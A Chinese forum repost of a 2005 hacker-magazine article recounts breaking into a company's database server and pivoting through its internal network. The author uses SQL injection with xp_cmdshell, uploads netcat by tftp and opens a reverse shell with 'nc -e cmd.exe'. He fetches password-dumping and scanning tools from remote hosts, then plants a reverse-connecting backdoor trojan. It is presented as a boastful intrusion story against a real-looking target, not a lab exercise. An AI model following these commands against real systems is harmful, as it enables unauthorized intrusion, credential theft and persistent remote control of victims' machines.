QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 3279|回复: 2
打印 上一主题 下一主题

记一次艰苦的入侵

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-3-20 13:42 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
图/文 勇哥儿
4 ]' x8 \5 U7 \) d( l
, ~$ L+ f3 M2 W F" l# R% l/ z9 \
本文已在黑客防线05年第3期发表
; V- ?0 m8 D8 C0 s9 ?
04年不平凡的一年,各种漏洞相继发现,各种入侵技巧也应运而生,原本固若金汤的机器,在新的漏洞面前,也变的弱不禁风。牛人发现并编写的Serv-u的溢出程序,为提升系统权限大开方便之门,NBSI把SQL注入发挥的淋漓尽致,PHP注入也日趋成熟,哪位怪才发现的上传漏洞在很多脚本中也都花样倍出,像DV,DZ等等大名鼎鼎的论坛也是漏洞叠报,数家著名公司被敲诈,黑客组织也是明争暗斗,虚拟主机也饱受旁注困扰。攻与防就像矛与盾,从某种意义上来说,攻就是防,防就是攻!
! Z( h1 W( o" d) B) m
“千里之堤,溃于蚁穴”,一个小小的漏洞就可以攻克一台机器,甚至占领整个内部网络。本文以一台机器为突破口,然后如何利用内网其它机器做跳板,最后控制目标机器(如果说利用一台机器上的某个站点来控制其它站点叫直接旁注的话,偶想把利用同一网内最弱的一台机器,来达到控制最强的机器叫问接旁注,比渗透入侵偶觉着好听点,其实方法很多牛人早用烂了,偶在这里现丑了)。
, K6 I& S3 i& B) S2 J9 l7 t( Z c
一、通过SQL注入漏洞,反向连接数据库机器。
2 F2 W' B$ V* W8 m
利用NBSI扫描发现存在SQL注入漏洞,而且还是SA权限,如图1
0 v8 F1 C8 K& }
; R5 K4 l/ p0 ~% s) a+ N 图1
/ y" x% J# k* g; {8 |, O) p/ P/ W$ B
利用NBSI的DOS执行命令,输入ipconfig –all 发现网址与WEB服务器不同,但是从网关上来看是在同一网段内。执行netstat –an查看数据库服务器所开的端口,发现很多1433端口都是WEB服务器连接,21,23,80端口没!利用NBSI的浏览目录功能,没发现机器上存在PCANYWHERE和SERV-U(利用它们可以远程控制,提升权限,或猜测口令)。利用net start 命令没发现如瑞星,KV等杀毒软件_blank">防火墙服务,然后利用HSCAN1。2和NMAP3。7扫描数据库服务器的外网IP进,竟然没扫到一个开放的端口!(估计机器上装了硬件_blank">防火墙!)对付_blank">防火墙,偶想到了反向链接,在本地开了一个TFTP,利用命令, tftp –I ip get nc.exe 很幸运的上传了一个NC上去,利用同样的方法也上传了一个MT。EXE(MT.EXE是一个网络管理方面的软件,依照yy3的说法,也就是 "七拼八凑来的,纯粹是图个方便。"可是这个方便个真的是太方便了,仅40K的一个程序,但是集合了近四十种的命令于一身)上去。也可以利用FTP命令,把FTP命令用ECHO命令写进一个文件里面,最后在用FTP –S:FILENAME来实现文件的下载。在本机利用NC监听66端口,命令如下:NC –L –P 66 ,远程机器上执行:NC –E CMD。EXE IP 66不一会儿,一个SHELL就出来了(还是在这里面运行命令爽啊,在NBSI里憋死了,有时在NBSI里执行命令时会出现“意外数据”,还要被破在游览器里执行_cmdshell%20'dos">http://www.***.com.tw/***/***.asp? mode=1&ID=256;exec%20master..xp_cmdshell%20'dos command';--)利用net view 命令查看共有三台机器!如图2
, K i1 C' t& {6 E* O, C
4 H4 [5 j3 y( C) J5 ^1 R B 图2
3 U" {$ B: c5 V
在利用命令:NET VIEW \\机器名 时得到的内容为空,看来是没共享目录啊! $ N$ {/ x) }$ I8 l4 `' ^' f; F二、上传反弹、监听木马显奇功。
9 \: i$ d6 h2 y1 r- s! ^. |5 ~' j) X* M
利用MT。EXE –SYSINFO命令显示出数据库服务的系统信息,网卡信息,配置信息,和所安装的软件信息。如图3(只截了系统信息)
7 U- Y0 |0 R7 r# e
9 z5 R9 d+ Q$ P* h) L Y
! I' c" q' i( P. a6 @ V( n
图3
U1 E z" |. p7 {+ | J3 m, a
是WIN2003怪不得用MT –FINDPASS命令没显出密码来,它只显示的2K密码。利用命令mt –netget http://www.***.com/findpass2003.exe(mt -netget <url> <filename to saved> ---Download from http/ftp.)下载到本地一个看WIN2003密码软件!!运行findpass2003.exe后没有在内存中找到密码!(看来的想办法让管理员登录了!哈哈)
- P% L% `( ^' G! ~
运行命令: mt –netget http://www.***.com/hacan120.rar hscan.rar 下载一个HSCAN1。2进去,利用同样的方法又下载进去一个UNRAR。EXE然后执行命令:unrar.exe x hscan.rar 这样就把HSCAN。RAR解压到HSCAN目录当中了!可以利用HACSN1。2版本的DOS命令进行内网扫描,命令如下:hscan -h www.target.com -all –ping扫完其余两台以后没发现任何弱口令,但发现它们在内网中开了很多端口,如:21,80,135,139,3389 等
2 J3 d- ~: h0 Z8 Y1 l: C- m
注意:HSCAN扫描完了以后,会生成报告,自动用浏览器打开,应该利用MT –PSLIST 和MT –PSKILL把这个浏览器关掉!
6 g0 o4 z3 F- Y( E/ w- {: ?( n* O" [
即然开了3389能不能利用端口重定向,把它定向到数据库这台机器上呢,经过实践利用mt -redirect <TargetIP> <TargetPort> <ListenPort> ----TCP port redirector. 和利用FPIPE都没有成功(定向后,用NETSTAT –AN命令看是端向成功,但是在外网还是没法访问)哪数据库这台机器能不能利用带反弹型的图形木马来控制屏幕呢?实践证明利用神气儿,灰鸽子,溯雪都失败了!看来只能装DOS版的后门了,哪试试APR欺骗如何?因在DOS下没法安装图形界面的WINPCAP,所以ARPSINFFER。EXE无法运行!(后来自己做了一个DOS版的)
3 Y$ `/ j# T- t. _( _
这台机器上除了操作系统,数据库,WIN2003补丁外什么都没装,难道真的就没有办法了吗?这时偶想到了一个木马,一个女黑客编写的,即有反向连接功能,又有监听功能,是什么呢?聪明的朋友,你猜到了吗?她就是大名鼎鼎,如雷贯耳,威名远波,无所不知的WOLLF(偶好喜欢她啊! 哈哈)运行WOLLF –SETUP后做一个反向链接的木马,偶选择的是反向链接所取的IP放在一个HTTP空间的文件中!制作好后,同样利用MT。EXE –NETGET命令下载到数据库服务器当中,运行后,它会自动向你的HTTP空间中存放的文件中去取反向链接的IP和端口,这时你可以在本机上用NC –L –P PORT 慢慢等待,一会以后,反向连接成功了,输密码进入吧!如图4
0 g$ D6 X' [2 R4 p) b0 ]
" |. T2 w! b+ G 1 V% B# h3 y0 z 图4
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
echo88        

0

主题

4

听众

36

积分

升级  32.63%

  • TA的每日心情
    郁闷
    2015-9-14 01:51
  • 签到天数: 6 天

    [LV.2]偶尔看看I

    新人进步奖

    回复

    使用道具 举报

    0

    主题

    3

    听众

    23

    积分

    升级  18.95%

    该用户从未签到

    新人进步奖

    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册地址

    qq
    收缩
    • 电话咨询

    • 04714969085
    fastpost

    关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

    手机版|Archiver| |繁體中文 手机客户端  

    蒙公网安备 15010502000194号

    Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

    GMT+8, 2025-6-7 06:09 , Processed in 0.880439 second(s), 63 queries .

    回顶部